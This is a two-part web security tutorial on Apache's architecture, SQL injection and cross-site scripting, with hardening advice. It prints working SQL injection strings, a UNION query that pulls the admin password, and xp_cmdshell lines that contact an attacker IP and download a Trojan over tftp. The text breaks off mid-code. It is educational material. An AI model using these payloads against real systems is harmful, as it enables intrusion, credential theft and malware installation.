Targeted at readers with Web security concerns, information security experts, systems administrators and all those who want to jump-start their careers in Web security, this series of articles intends to cover the strengthening of Web applications and the Apache Web server framework, as well as any possible attacks against both.
With about a 54-56 per cent share of the Web server market, according to a survey by news.netcraft.com, Apache is the second most famous project in the open source world, after Linus Torvalds’ Linux kernel. It is, indeed, a de facto standard for Web applications. However, because of the high market share, it has always been a hunting ground for attackers, and is still vulnerable to many known and unknown malicious attacks. An unsecured Apache server can have a devastating effect on your website, the server as a whole, and also on your reputation, if your site is broken into.
However, the response to that is to secure our Web applications and Web server framework—and that’s what we will be doing in this series. Starting with an introduction to Apache’s architecture, we will look at the many attacks that are possible on your Apache Web server or Web application—and of course, we look at some good security solutions, too. Some golden advice, before we start: read these articles with an attacker’s mindset, to gain the upper hand and keep your server secured.
Dissecting Apache
It’s quite obvious that to secure any system, you need to start with a good knowledge of its architecture. This section looks at Apache’s innards, making it clear how Apache handles applications and modules. The components shown have high interactivity with each other, and that makes security a complex issue. Each type of external system (a database, an LDAP server, a Web service) uses a different language, and allows for different attack vectors, increasing the chances of a security failure.
Figure 1 illustrates a typical Apache server set-up, with an overview of Apache components.
The core of Apache implements the basic functionality of the Web server. The following are its main components:
1. http_protocol.c —contains functions that handle all the data transfers to the client, following the HTTP protocol.
2. http_request.c —handles the flow of request processing, and controls the dispatching of work to modules, in the appropriate order. It is also responsible for error handling.
3. http_main.c —starts up the server; this contains the main server loop that waits for, and accepts, connections. It is also in charge of managing time-outs.
4. http_core.c —is the base component that implements Apache’s basic functionality. Although this component also uses the Apache module API, it is a special one; it has a non-standard file name, http_core, instead of the expected mod_core. It behaves like a module, but has access to some globals directly, which is not characteristic of a module.
5. http_config.c —is responsible for managing information about virtual hosts and reading configuration files; it also maintains a list of modules that are called in response to requests.
Apache also supports a variety of features, many implemented as compiled modules, which extend the core functionality. These can range from CGI or PHP support, to authentication and logging schemes. Modules do not interact directly with one another; they interact through the core, since the core contains linked lists of installed modules and their handlers. Each module has handlers defined for it—for actions like sending a file back to the client (send-as-is handler), treating a file as a CGI script (cgi-script handler) or parsing it for SSI (server-side includes—the server-parsed handler), and many others. Each handler represents a specific action to be performed when a request is received. The core calls the specific handler, thus invoking the module that has defined that handler, for a specific request.
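The dispatch idea described above can be pictured with a small Python sketch. It is only an illustration, not Apache's actual C code: the Core class, the function names and the request dictionary are assumptions made for this example, and only the handler names (send-as-is, cgi-script) come from the text.

```python
# Illustrative only: a toy "core" that keeps a registry of handlers and
# dispatches requests to them, so modules never call each other directly.
from typing import Callable, Dict

Handler = Callable[[dict], str]


class Core:
    def __init__(self) -> None:
        self._handlers: Dict[str, Handler] = {}

    def register(self, name: str, handler: Handler) -> None:
        # A module registers the handler it defines with the core.
        self._handlers[name] = handler

    def dispatch(self, handler_name: str, request: dict) -> str:
        # The core looks up the handler and invokes the owning module's code.
        handler = self._handlers.get(handler_name)
        if handler is None:
            return "500 no handler registered"
        return handler(request)


def send_as_is(request: dict) -> str:
    return f"as-is: {request['path']}"


def cgi_script(request: dict) -> str:
    return f"cgi output for {request['path']}"


core = Core()
core.register("send-as-is", send_as_is)
core.register("cgi-script", cgi_script)
```

Calling core.dispatch("cgi-script", {"path": "/cgi-bin/form"}) runs only the CGI handler. A handler that was never registered is simply unavailable, which is one way to picture why trimming the active module set reduces what an attacker can reach.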
After successful installation and basic configuration of Apache, the first thing you need to do, from the security perspective, is to carefully select your active module set. You should disable modules that are enabled by default, such as mod_info, mod_status, mod_userdir and mod_include, unless you have a sound reason for keeping them enabled.
Why, you may well ask. It’s simple—they can expose your server to attack, or yield useful information to an attacker. The first two modules expose the Web server configuration and real-time information as Web pages. The mod_userdir module allows each user account on the server to have a personal website in the home directory, accessible via a /~username alias. Apache returns error 404 when a user account, whose personal site is requested, doesn’t exist; and it returns error 403 when a website is not found in that user’s home folder. The errors generated expose valid user account names on the server; it is a common ploy for attackers to try to log in to the server with these discovered accounts, and with commonly used weak passwords. Once they obtain a shell session on the server, there are several privilege-escalation techniques they can try to become the super-user.
The mod_include module provides scripting functionality. Though powerful, there are many malicious exploits available that are designed specifically for this module. Disable it if you don’t need it!
Phases in Apache request processing
For Apache to return a complete response to a client request, more than one module is needed. As already noted, all the modules communicate with or respond to each other through the core. Thus, control is switched back and forth between the core and different modules. All this is done by dividing the request into a set of different phases; let’s look at each of the typical request-to-response phases.
URI to file-name translation phase
In a normally configured server, two basic modules, mod_userdir and mod_rewrite, are used in this phase. (However, you should already have disabled mod_userdir, for reasons stated above.) The mod_rewrite module provides you with a flexible mechanism for rewriting the requested URL to a new one. It uses custom rules, each stating that if a predefined pattern is found in the requested URL, the URL is rewritten to a new one. It is a good idea to install this module, since it reduces the chances of malicious code in the URL (such as local and remote file inclusions, which we’ll discuss in upcoming sections).
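To make the pattern-and-replacement idea concrete, here is a minimal Python sketch of rule-based URL rewriting. It does not use mod_rewrite's own directive syntax; the rule table, the rewrite function and the /products.php path are all hypothetical names chosen for illustration.

```python
import re
from typing import List, Optional, Tuple

# Each rule is (compiled pattern, replacement).
# A replacement of None means "refuse the request".
RULES: List[Tuple[re.Pattern, Optional[str]]] = [
    # Refuse paths that try to climb out of the document root.
    (re.compile(r"\.\./"), None),
    # Map a friendly URL such as /product/42 to the script that serves it.
    (re.compile(r"^/product/(\d+)$"), r"/products.php?id=\1"),
]


def rewrite(path: str) -> Optional[str]:
    """Apply the first matching rule; return None if the request is refused."""
    for pattern, replacement in RULES:
        if pattern.search(path):
            if replacement is None:
                return None
            return pattern.sub(replacement, path)
    # No rule matched: the path passes through unchanged.
    return path
```

Because the second pattern only accepts digits, a request like /product/42 is rewritten, while anything else in that position never reaches the script through this rule.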
Note: URI (Uniform Resource Identifier) is the generic term for a family that includes Uniform Resource Names (URN), Uniform Resource Characteristics (URC), Location-Independent File Names (LIFN), and of course, the URL, the grand daddy of them all.
The authentication and authorisation phase
This phase has sub-phases:
1. Checking the host address and other available information: Here, mod_access comes into the picture. Basically, mod_access enables you to authorise access based on the host name or IP address from which the request came.
2. Authenticating user ID in the HTTP request: Here mod_auth, the default authentication module, is used. It enables you to authenticate users whose credentials (a username and an encrypted password) are stored in text files. From the security perspective, this module is not recommended, since it is not designed to handle a large number of users. Just a few thousand user requests can cause lookup performance to drop dramatically, which an attacker may exploit for a denial-of-service (DoS) attack. To deal with this problem, we’ll be using traffic-shaping modules in subsequent sections. The mod_auth_anon module is used for anonymous authentication.
Determining the MIME type of request
In this phase, the content type, encoding, language and other related parameters of the request are worked upon. The mod_mime and mod_mime_magic basic modules are used here. The former enables Apache to determine MIME type by using file extensions, and provides clients with meta-information about documents. It also enables you to define a handler to determine how the document is processed. The mod_mime_magic module does the same task, but by comparing the first few bytes of the file with a magic value stored in a file. It is only needed when mod_mime fails to determine a known MIME type.
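The two strategies, extension first and magic bytes as a fallback, can be sketched in Python as follows. This is an analogy rather than Apache's implementation: mimetypes is Python's standard library module, while the tiny MAGIC table and the function names are assumptions made for the example.

```python
import mimetypes
from typing import Optional

# A tiny, hand-picked table of magic numbers (the first bytes of a file).
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"%PDF-": "application/pdf",
    b"GIF89a": "image/gif",
}


def guess_by_extension(filename: str) -> Optional[str]:
    # Comparable in spirit to mod_mime: decide from the file extension.
    mime, _encoding = mimetypes.guess_type(filename)
    return mime


def guess_by_magic(data: bytes) -> Optional[str]:
    # Comparable in spirit to mod_mime_magic: inspect the leading bytes.
    for prefix, mime in MAGIC.items():
        if data.startswith(prefix):
            return mime
    return None


def guess(filename: str, data: bytes) -> Optional[str]:
    # Extension first; content sniffing only when the extension is unknown.
    return guess_by_extension(filename) or guess_by_magic(data)
```

A file named report with no extension but starting with %PDF- would be identified only by the fallback.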
The fixing-up phase
The mod_alias module works to map one part of the user-perceived file-system to another. For example, if a request is received for http://www.site.com/info/info.php, then it can be redirected to http://www.site.com/info/lfu/info.php. In such tasks, mod_rewrite has the upper hand over mod_alias since mod_rewrite can also map URLs with different host-names, and can perform complicated tasks such as manipulating the query string. Also in this phase, the mod_env module is used to enable you to pass environment variables to external programs, such as CGI, PHP, mod_perl scripts, or SSIs.
The response phase
This phase can use different modules to create a response. For example:
mod_asis can be used for static pages; it enables you to send documents ‘as-is’ to clients, without Apache adding the usual HTTP headers (the file supplies its own). This can be useful when redirecting clients without the help of any scripting.
mod_cgi invokes CGI scripts and returns the result.
mod_include handles server-side includes. (Typically, an SSI page is an HTML page with embedded commands for Apache.) Many other modules can also generate responses.
The request logging phase
Knowing who (or what) is accessing your website is very important for security reasons. Apache provides you with mod_log_config, which is responsible for basic logging, and writes CLF files by default. In addition, mod_usertrack can log information on cookies, which is also crucial.
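As a rough illustration of what a CLF (Common Log Format) entry holds, the Python sketch below splits one line into its fields. The regular expression, the parse_clf name and the sample line (including its IP address and path) are made up for this example; real logs may use extended formats that this pattern does not cover.

```python
import re
from typing import Optional

# host ident user [time] "request" status size
CLF = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_clf(line: str) -> Optional[dict]:
    """Return the fields of one CLF line, or None if it does not match."""
    match = CLF.match(line.strip())
    return match.groupdict() if match else None


# Hypothetical entry: a probe of a mod_userdir alias answered with 403.
sample = '192.0.2.7 - - [10/Oct/2010:13:55:36 +0530] "GET /~arpit/ HTTP/1.1" 403 209'
entry = parse_clf(sample)
```

Grouping parsed entries by host and status is one simple way to spot a client that is cycling through /~username paths.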
You can look at http://httpd.apache.org/docs/2.0/mod/ for a complete list of modules, with links to pages documenting their use and directives. Module directives are configured in /etc/httpd.conf, Apache’s main configuration file.
These concepts on Apache might have been just revision for you, but we will move to learning how to use these to secure Apache configurations, in articles that follow this one. For now, though, we take a look at something else that is important from the security perspective!
What do you use Apache for? Obviously, to let the world access your Web applications! Now, if your Web application itself has security flaws, then it’s no use trying to create even the most secure configuration for the Apache Web server, because an attacker can enter your site without restriction, through a flawed Web application! This is what our next section focuses on: identifying the potential flaws in your Web application, beginning with the most common ones, and on how to seal the holes so attackers face a much more secured Web application.
Securing your applications—learn how break-ins occur
Figure 2 is a typical client-server Web architecture
Shown in Figure 2 is a typical client-server Web architecture, which also indicates various attack vectors, or ways in which Web application attacks affect the regular data flow. We will cover each of these in this series of articles, beginning with injection flaws.
Injection flaws are so named because when they are used, malicious attacker-supplied data flows through the application, crosses system boundaries, and gets injected into other system components. These are fairly dangerous attacks, and mostly work because a string that is harmless for PHP (or another website scripting language) can turn into a dangerous weapon when it reaches the database. Such flaws and attacks are particularly important, since they can affect any dynamic Web application that has not been tested and carefully secured against such holes. We will now take a closer look at the most often encountered injection flaw, SQL injection.
SQL injection
SQL injection is an exploit in which the attacker injects SQL code into a request to the server (generally through an HTML form input box), to gain access to the back-end database, or to make changes in it. If not sanitised properly, SQL injection attacks on your Web application could allow attackers to even ruin your website, besides extracting confidential data. Website features such as login pages, feedback forms, search pages, shopping carts, etc, that use databases, are more prone to SQL injection attacks. The attacker injects specially crafted SQL commands or statements into the form, trying to achieve various results.
Almost all scripting technologies (ASP, ASP.NET, PHP, JSP and CGI) are vulnerable to this attack if they use MS SQL Server, Oracle, MySQL, Postgres or DB2 as their database. Basic knowledge of SQL commands, and some creative guesswork, is all it takes to penetrate an unsecured application. Network firewalls and IDSs (Intrusion Detection Systems) might not help, since they provide filters on HTTP, SSL and other Web traffic ports, but the communication with the database is still unsecured. Most programmers are still not aware of the problem, and the scenario seems to be getting worse: the Web security consortium informs us that SQL injection comprised over 7 per cent of all Web vulnerabilities present in every 15,000 applications that it scanned!
Note: SQL injection is a ‘global’ type of attack; it is not restricted to open source platforms, databases or applications, as you can see from the inclusion of proprietary software products in the list above.
SQL injection via a login form
Let’s take a common vulnerable code snippet in an ASP page, which generates a login validation query that is meant to be run on an MS SQL server database:
var sql = "SELECT * FROM Users WHERE usr='" + user + "' AND password='" + paswd + "'";
In case a valid user enters (into the ASP login page) his username as ‘arpit’, and his password as ‘bajpai’, then the generated query becomes:
SELECT * FROM Users WHERE usr='arpit' AND password='bajpai'
That’s pretty innocuous, and exactly what the person who wrote the ASP code intended. However, note what happens if an attacker submits malicious text in the username field, something like ' or 1=1 -- (with the password left blank). The query then becomes:
SELECT * FROM Users WHERE usr='' or 1=1 --' AND password=''
Because a pair of hyphens designates the beginning of a comment in SQL Server’s T-SQL, the effective query is now:
SELECT * FROM Users WHERE usr='' or 1=1
For readers who don’t know SQL, this translates to, “where the user field is blank, OR 1=1”. The trick is that for the logical OR condition, this will always evaluate to True, since one of the operands to the OR statement is True. Thus, this query returns multiple user records, which validates the malicious login!
It doesn’t stop there, however: since most Web applications have their ‘administrator’ user account added to the Users table as the first thing during development, the ASP code in the login page sees that record as the first returned record, and assumes it is the admin user logging in! A person, who doesn’t even know a valid username and password, is given administrative permissions in your Web application…
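The login bypass can be reproduced safely on your own machine with a short Python sketch. Note the assumptions: it uses Python's built-in sqlite3 module with an in-memory database instead of ASP and MS SQL Server (SQLite also treats -- as a comment), and the table contents and function names are invented for the demonstration. The second function shows parameterised queries, a widely used defence that keeps input out of the SQL text.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # In-memory database with the admin account added first, as in the text.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (usr TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [("admin", "s3cret"), ("arpit", "bajpai")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, paswd: str) -> list:
    # Same mistake as the ASP snippet: input is pasted into the SQL text.
    sql = ("SELECT usr FROM Users WHERE usr='" + user +
           "' AND password='" + paswd + "'")
    return conn.execute(sql).fetchall()


def login_parameterised(conn: sqlite3.Connection, user: str, paswd: str) -> list:
    # Placeholders keep the input as data; it is never parsed as SQL.
    sql = "SELECT usr FROM Users WHERE usr=? AND password=?"
    return conn.execute(sql, (user, paswd)).fetchall()


conn = make_db()
payload = "' or 1=1 --"
```

With this set-up, login_vulnerable(conn, payload, "") returns every row in the table, while login_parameterised(conn, payload, "") returns none, because the payload is compared as an ordinary (and non-existent) username.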
SQL injection via query string (URL)
An attacker might also attempt an SQL injection attack by adding SQL to the URL. How does that work? Let’s look closely at an example. Assume a database with table and rows as created and populated by this SQL:
CREATE TABLE Products
(
    ID INT identity(1,1) NOT NULL,
    prodName VARCHAR(50) NOT NULL
)
INSERT INTO Products (prodName) VALUES ('Dell laptops')
INSERT INTO Products (prodName) VALUES ('Nokia express music')
INSERT INTO Products (prodName) VALUES ('Samsung dual sim range')
Let’s also assume that an ASP script called products.asp on the site uses the database with the above table.
If we visit products.asp in our browser with the (normal) URL http://www.example.com/products.asp?productId=1 then we will see the result “Got product Dell laptops”. The parameter is taken directly from the query string (submitted URL) and concatenated to the WHERE clause of the query, so the query generated by passing productId=1 in the URL is:
SELECT prodName FROM products WHERE id = 1
Now, if the attacker tampers with the URL and submits something like http://www.example.com/products.asp?productId=0 having 1=1 then the constructed query becomes:
SELECT prodName FROM products WHERE id = 0 having 1=1
This would produce an error like the one shown in Figure 3, or something similar.
Figure 3: SQL vulnerability error
You can also see the error exposing the products fields such as products.prodName. The attacker can use this information maliciously, to insert or delete data from the table. For example, here is a sample malicious query injection:
http://localhost/products.asp?productId=0;INSERT INTO products(prodName) VALUES(left(@@version,50))
Basically, it returns “No product found”; however, it may also run an INSERT query, adding the first 50 characters of SQL Server’s @@version variable (which contains the details of SQL Server’s version, build, etc) as a new record in the Products table. The attacker can then use this information to research specific exploits for that version of SQL Server.
Some programmers suggest using double quotes instead of single quotes for security, but this is only a halfway measure: numeric fields and dates in forms or parameters remain vulnerable. The example below, using PHP/MySQL, builds a query that has no single quotes in its syntax at all.
$a = "SELECT * FROM accounts WHERE account = $acct AND pin = $pin";
Now suppose the attacker enters the following into the HTML form fields meant to accept numbers: $acct = a or a=a # and $pin = 1234. The resultant query would be like the following:
SELECT * FROM accounts WHERE account = a or a=a# AND pin = 1234
(In this case, the comment character is # instead of the double dash because the database is MySQL.) Other such strings used by attackers are ' or a=a --, ' or 'x'='x, 1' or '1'='1, ' or 0=0 #, " or "a"="a, ') or ('a'='a, etc. Notice the power of single quotes in such strings.
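Since the numeric example needs no quotes at all, quote handling alone cannot stop it. A simple server-side check is to accept a numeric field only if it consists of plain digits, and to reject everything else rather than trying to repair it. The sketch below is one possible way to do that in Python; the function name is hypothetical.

```python
from typing import Optional


def parse_numeric_field(raw: str) -> Optional[int]:
    """Return the value as an int, or None if it is not plain ASCII digits.

    The caller is expected to reject the request when None is returned,
    not to escape or modify the input.
    """
    text = raw.strip()
    if text.isascii() and text.isdigit():
        return int(text)
    return None
```

Here parse_numeric_field("1234") yields 1234, while the injected value a or a=a # yields None, so it never reaches the query string.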
Running system commands on SQL Server
By attacking an SQL Server, an attacker can also gather IP address information through reverse lookups, by running system commands. For example (a.b.c.d represents the attacker’s IP address):
';EXEC master..xp_cmdshell "nslookup example.com a.b.c.d"
When this fragment is injected, the SQL back-end will now execute an nslookup using the attacker’s system as the name server. Attackers can use multiple methods, including a network sniffer like tcpdump, on their box, to find the IP address that made the DNS query. If it is a public IP address, the attackers have gained crucial information: they can then compile and launch exploits against that IP address, which are tailored to the operating system and database software.
It is sometimes possible, even if the SQL Server machine doesn’t have a public IP address, that an attacker can download a Trojan or backdoor program onto the SQL Server (a.b.c.d is the IP address of a server hosting the malware program):
';EXEC master..xp_cmdshell "tftp -i a.b.c.d GET Trojan.exe c:\Trojan.exe"
The downloaded program could be launched with another xp_cmdshell invocation. It could do many things at this point, including connecting outward to the attacker’s IP address, to provide the attacker with a direct channel to command the server operating system. If the SQL Server software is running as the Windows Administrator user (an all too common shortcut that people take when installing), then the attackers now effectively ‘own’ the server. They can then transfer files from the server, using tftp, which could include confidential, financial or even system password files.
More than that, the attackers are now ‘inside’ the private network—they can locally access other systems on the LAN, and try to break into them, something that they could not do directly because the LAN was protected by a firewall blocking connections from the Internet, except for proper requests like HTTP/HTTPS to the Web server.
If you want more practical examples of this attack vector, there are a whole bunch of videos available on YouTube and Metacafe. I would like to reiterate here that neither I nor LFY aims to teach readers to attack servers; this is meant to give you knowledge that you need in order to protect your own infrastructure.
Penetration-testing for the SQL injection vulnerability
Let’s take a look at the methodology adopted by many penetration testers to check for SQL injection vulnerability.
Scanning for entry points
This initial stage is to find vulnerable entry points such as fields in entry forms, values stored in cookies, and hidden fields. For this, the fuzzing technique is used to send specific string combinations with SQL characters and words. An unexpected error response, or a change in application behaviour, indicates a vulnerable point that may afford an attacker entry.
“Fuzzing”
Fuzzing is an automated software testing technique that provides invalid, unexpected data as input to the application. If the application responds unexpectedly, or shows reduced performance, it can be noted for further action.
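A very small fuzzing loop can be sketched in Python as shown below, for use against code you own. It makes several assumptions: the target is a local function backed by an in-memory SQLite database rather than a live website, and the search function, the probe list and the fuzz helper are all invented for the example.

```python
import sqlite3
from typing import Callable, List, Tuple

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, prodName TEXT)")


def search(term: str) -> list:
    # Hypothetical vulnerable entry point: input is concatenated into SQL.
    sql = "SELECT prodName FROM products WHERE prodName = '" + term + "'"
    return conn.execute(sql).fetchall()


# One harmless value followed by two strings containing SQL characters.
PROBES = ["laptop", "'", "' or 1=1 --"]


def fuzz(target: Callable[[str], object], probes: List[str]) -> List[Tuple[str, str]]:
    """Feed each probe to target and record the ones that raise an error."""
    findings = []
    for probe in probes:
        try:
            target(probe)
        except Exception as exc:  # any unexpected failure deserves a look
            findings.append((probe, type(exc).__name__))
    return findings


findings = fuzz(search, PROBES)
```

In this sketch only the lone single quote triggers a database error. That error is the signal that input reaches the SQL parser unfiltered. The third probe raises no error at all, which is why a change in behaviour, and not just an error, has to be watched for.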
Information gathering
The next step is to gather as much information as possible about the underlying application, by going through the following steps:
1. Errors in responses: For the attacker, the easiest situation would be to have the results of the modified query displayed as part of the Web server’s response. If the Web server (Apache, in this case) is configured to display error messages, a lot of information can be extracted through them. For example, a 403 error page on Apache’s website shows apache/2.2.12 (unix) mod_ssl/2.2.12 openSSL/0.9.7d mod_wsgi/3.2 python/2.6.5rc2 server at httpd.apache.org port 80. The information includes specific software component information and version numbers, including the version number of Apache. This can be used by attackers to run exploits known to work for a particular version. Moreover, database error messages may also leak information about the table or database structure—for example, an error message saying that some columns have not been grouped, when you inject a HAVING clause into a SELECT statement.
2. Guessing the database: Most of the time, error responses also help in guessing the databases in use. For example, if the Web server is Apache, and the website is built using PHP, then chances are the database is MySQL. If the website is in ASP, then it’s likely that it uses an MS SQL Server database. However, a more effective way of distinguishing databases is the table provided by the OWASP Web application security project, which is shown in Figure 4. You can relate keywords in error messages from queries that you inject, with those in Figure 4, to guess the database.
3. Understanding the query: It is important to know in what kind of query, and in which part of the query, our injection landed. It could be part of a SELECT, UPDATE, EXEC, INSERT, DELETE or CREATE statement, or part of a sub-query. Start by determining which field is doing what with your input. For example, in the ‘Change Your Password’ page, the SQL code may be: SET password = 'new password' WHERE login = user AND password = 'old password'. Here, if you inject a new password and a comment character in the ‘New Password’ field, you may end up changing every password in the table to the one you specified. In the same manner, we can guess a SELECT query structure, for example, by comparing the output of ' and '1'='1 with that of ' and '1'='2. You can also generate specific errors to determine table and column names, like: ' GROUP BY columnnames HAVING 1=1 --
You can inject entire queries after a query termination character, as we saw earlier, to help in determining table names and columns. For MySQL, the query is SHOW columns FROM tablename, while in Oracle it would be SELECT * FROM all_tab_columns WHERE table_name = 'tablename'. Similarly, DB2, Postgres, etc, have their own syntax.
4. Time to penetrate: Once basic information about the database, the query structure and privileges is known, the penetration is started. Extracting data is easy once the database has been enumerated, and the query is understood. For example, to get the password for the login name admin we would try the malicious URL: http://www.example.com/products.asp?id=0 UNION SELECT TOP 1 password FROM account_table WHERE login_name='admin'-- . The same applies to any other specific login name. You can also extract password hashes by converting hashes kept in binary form to hex format, so that they can be displayed as part of an error message.
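To see how much the error-page banner quoted in step 1 gives away, the short Python sketch below splits it into product and version pairs. The components function and its regular expression are illustrative assumptions; the banner string is the one quoted above.

```python
import re
from typing import Dict

# The server signature quoted in step 1 above.
BANNER = ("apache/2.2.12 (unix) mod_ssl/2.2.12 openSSL/0.9.7d "
          "mod_wsgi/3.2 python/2.6.5rc2")


def components(banner: str) -> Dict[str, str]:
    """Return {product: version} for every product/version token."""
    return dict(re.findall(r"([A-Za-z_]+)/(\S+)", banner))


leaked = components(BANNER)
```

Five separate version numbers come out of a single error page. Each one narrows the search for a matching exploit, which is the reason to keep such details out of responses served to the public.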
We have covered a lot about SQL injection attacks so far, but if you want to know more, explore the references at the end of the article. Now, the biggest question left to be answered is: How do we make our present Web applications attack-proof, or at least as hostile as possible to malicious SQL injectors? The answer is to carefully follow the tips given below:
1. The best way to check whether your website and applications are vulnerable to SQL injection attacks is by using automated and heuristic Web vulnerability scanners (see the ‘Web App Security Checking’ box). These can also check for cross-site-scripting attacks, and many more attacks that we will be dealing with in later articles.
2. Input validation is the most important part of defending yourself against SQL injection. If the input is supposed to be numeric, use a separate variable in your server-side scripts to store it, and reject bad input, rather than attempting to escape or modify it.
3. Implement filters against keywords like “select”, “insert”, “update”, “shutdown”, “delete”, “drop”, and special characters like “--” and “'”. Also, don’t do these validations in JavaScript on the client side; rather, do such filtering at the server side itself. Not only will smart attackers figure out how to bypass your JavaScript, they will also learn exactly what special filters you have, when they view the JavaScript.
4. Try to use encrypted cookies, and not to store values in hidden fields.
5. Make sure you run database services as a low-privilege user account. Remove unused stored procedures and functionality, or restrict access to those, to administrators. Also change permissions and remove “public” access to system objects. If the application only requires read access to certain tables, then the account for that application must be limited to read access only. Don’t forget to firewall the server so that only trusted clients can connect to it.
6. Close off linked servers, such as FTP servers or Samba services that connect to the same system on which your database runs. Also, close unused network protocol ports, such as telnet and TFTP ports, when you don’t need them. This restricts attackers trying to upload Trojans or root-kits into your system through these ports.
7. Avoid using different databases linked together by a single application, as they may create code complexity, which ultimately may create loopholes for intruders.
8. As far as passwords are concerned, keep auditing them and change them regularly. Use complex passwords that are above 16 characters in length—this makes it hard for many brute-forcing programs to crack them. You can also set password validations that ask users to enter complex passwords. Encrypt and hash passwords and other sensitive data; never store them in clear-text. Encrypting connection strings is also a good practice.
9. Add extra code in your scripts to log IP addresses that visit your site, and block suspicious IPs. You can also add scripts to show warnings like, “WARNING: Attacker, your IP address x.y.z.w has been logged. Legal action will be taken against you if your intentions are malicious.”
10. If you can, use databases which are not commonly used, because they are likely to have fewer known exploits against them. Regularly consult your system vendor for security and performance hot-fixes and related patches.
11. Use these tools of the security industry:
SQLninja is an automatic testing tool to exploit SQL-injection-vulnerable applications. It performs extensive DBMS back-end fingerprinting and brute forcing on account passwords. View more details at http://www.sqlninja.sourceforge.net.
Greensql is an open source database firewall that tries to protect against SQL injection errors. View its documentation at http://www.greensql.net/.
You can also go for the SQL injection blocking tool, SQLblock ODBC edition. It has an SQL injection prevention feature, which works as an ordinary ODBC/JDBC data source, and monitors every SQL statement being executed. It alerts the administrator if any malicious or forbidden SQL statement is encountered.
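As an illustration of tip 8 (never store passwords in clear text), the Python sketch below stores a salted, deliberately slow hash instead of the password itself. PBKDF2 is one reasonable choice among several and is my own pick, not something the tips prescribe; the function names and the iteration count are assumptions to be tuned for your environment.

```python
import hashlib
import hmac
import os
from typing import Tuple

ITERATIONS = 200_000  # assumed work factor; tune it for your hardware


def hash_password(password: str) -> Tuple[bytes, bytes]:
    """Return (salt, digest); store both, never the password itself."""
    salt = os.urandom(16)  # a fresh random salt for every password
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS
    )
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS
    )
    return hmac.compare_digest(candidate, digest)
```

Even if an injection flaw exposes the table, the attacker then obtains salts and digests rather than usable passwords.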
Since SQL injection has the dubious distinction of being the attack that any malicious attacker learns first, it is the first we have covered, and in depth. For more detailed information on SQL injection and other programming defences, don’t forget to visit www.owasp.org. We will deal with cross-site scripting, command execution and many other dangerous attacks on Web applications and Apache in the next article. Meanwhile, you can send your queries and constructive feedback to abajpai75 AT yahoo DOT com. Always remember: know hacking, but no hacking.
II.
In the previous article in this series, we started our journey to a secured Apache by dissecting its internals. We then looked at various attacks against Web applications via injection flaws, beginning with SQL injection. In this article, we will deal with another category of injection flaws: Cross-Site Scripting, a.k.a. ‘XSS’. I would like to reiterate here that neither I nor LFY aim to teach readers to attack servers; this is meant to give you the knowledge that you need to protect your own infrastructure.
Grabbing second position in OWASP’s latest Top Ten critical Web application security risks —after SQL injection flaws—is XSS. (By the way, the different first letter is used to avoid confusion with CSS—Cascading Style Sheets.) The security consortium says that XSS accounts for about 39 per cent of vulnerabilities in Web applications.
So what is XSS?
OWASP defines XSS as a flaw that occurs when an application includes user-supplied data in a page sent back to the browser, without properly validating or escaping that data. XSS attacks are essentially code-injection attacks, which exploit the interpretation process of the Web application in the browser. These attacks are carried out mainly on online message boards, Web logs, guest books, and user forums (collectively called ‘boards’, in the rest of the article), where messages are permanently stored. They are created using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side scripting technologies.
The goal of an XSS attack is to steal client authentication cookies, and any other sensitive information that can authenticate the client to the website. With a captured (legitimate) user token, an attacker can impersonate the user, leading to identity theft.
Unlike most attacks, which involve two parties (the attacker and the website, or the attacker and the victim/client), the XSS attack involves three parties: the attacker, the victim/client, and the website. An XSS attack tricks a legitimate user by posting a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the users once they click the link. This seemingly harmless website can be (and is, in many cases) a phishing clone of a page in the original website the user is browsing; it may prompt users for their username and password. Alternately, it may be just a ‘thank you’ page, which steals the users’ cookies in the background, without their knowledge.
Phishing
Phishing is an Internet scam where the user is convinced to supply valuable information (such as the username and password) to a malicious website that has been designed to closely resemble a legitimate website. The user is directed to it via links in bulk/spam e-mails, instant messages, etc. The majority of these can be avoided by carefully scrutinising the links and not clicking doubtful links; also check the URL bar (address box) of the browser to verify if you have arrived at a trusted site, before you enter your login credentials.
How an XSS attack works
XSS exploit code is typically (but not always) written in HTML/JavaScript to execute in the victim’s browser. The server is merely the host for the malicious code. The attacker only uses the trusted website as a conduit to perform the attack. Typical XSS attacks are the result of flaws in server-side Web applications, and are rooted in user input which is not properly sanitised for HTML characters. If the attackers can insert arbitrary HTML, then they could control the execution of the page under the permissions of the site. Common points where XSS opportunities exist for an attacker are ‘confirmation’ or ‘result’ pages (for example, search engines that echo back the user-input search string) or form-submission error pages that help the user by filling in parts of the form which were correctly entered.
A simple PHP page that prints a GET parameter straight into its output (for example, a hello.php that echoes the value of name) is vulnerable to XSS!
Once such a page is accessed, the variable sent via the GET method (a.k.a. the query string) is output directly to the page that PHP is rendering. If you pass legitimate data (for example, the string “Arpit Bajpai”) as an argument, the URL would be something like http://localhost/hello.php?name=Arpit%20Bajpai (assuming you’re running the server locally on your system, which you should be if you’re trying this out). The output of this is harmless, as shown in Figure 1.
Now, with a little tampering, we change the URL to:
http://localhost/hello.php?name=<h1>Hacked</h1>
The result is shown in Figure 2. It still looks relatively innocuous, but the fact that the input is not validated by the PHP script before outputting it to the victim’s Web browser opens the way for more harmful HTML to be included into the vulnerable page.
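To make the flaw concrete, here is a minimal sketch of the same pattern in JavaScript rather than PHP. One function drops the name parameter into the markup unchanged; the other escapes the HTML metacharacters first. The function names, the greeting text and the sample input are all hypothetical, chosen only for illustration.

```javascript
// Replace the five characters that have special meaning in HTML.
function escapeHtml(text) {
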